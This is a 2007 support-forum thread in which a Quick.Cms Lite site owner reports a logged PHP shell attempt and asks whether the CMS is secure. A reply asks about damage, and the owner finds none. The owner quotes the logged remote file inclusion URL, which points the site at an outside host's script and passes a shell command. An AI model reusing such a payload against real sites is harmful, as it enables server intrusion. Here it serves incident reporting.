PHPShell attack on a Quick.CMS lite site

Lubli

No avatar

2007-11-28 10:49

Hi all,

I had a php shell attack on my quick.cms lite site.

This is the url as logged in my statis: /?p=http://www.genesthatfit.com/tmp~1.txt?&cmd=id

You can see the content of the file browsing to: http://www.genesthatfit.com/tmp~1.txt
You'll find a a php script source.

It seems they (logged by a brazilian IP) try to execute a command $cmd=id.
My questions are:
is quick.cms secure? Whay may they have done or do with this attacks?

Thank you for your answer.
Bye,

» Quick.Cms v1.x

Lubli

merci

No avatar

2007-11-29 09:03

Lubli - hard to say what they may do... Have they done any damages?

Lubli

No avatar

2007-11-29 16:10

Well,
there are not new files uploaded on my server and all my files are working, all the permissions seems to be right, so I think they done no damages.

Thanks

Lubli

Back to top

Over 32 thousand websites based on Quick.Cart and Quick.Cms. See the most interesting ones...

  • Screenshot of website aparperfume.pl
  • Screenshot of website sportowcydzieciom.pl
  • Screenshot of website jezykipodroze.pl
  • Screenshot of website powiat-wieruszowski.pl
  • Screenshot of website 4carriers.com
about us | contact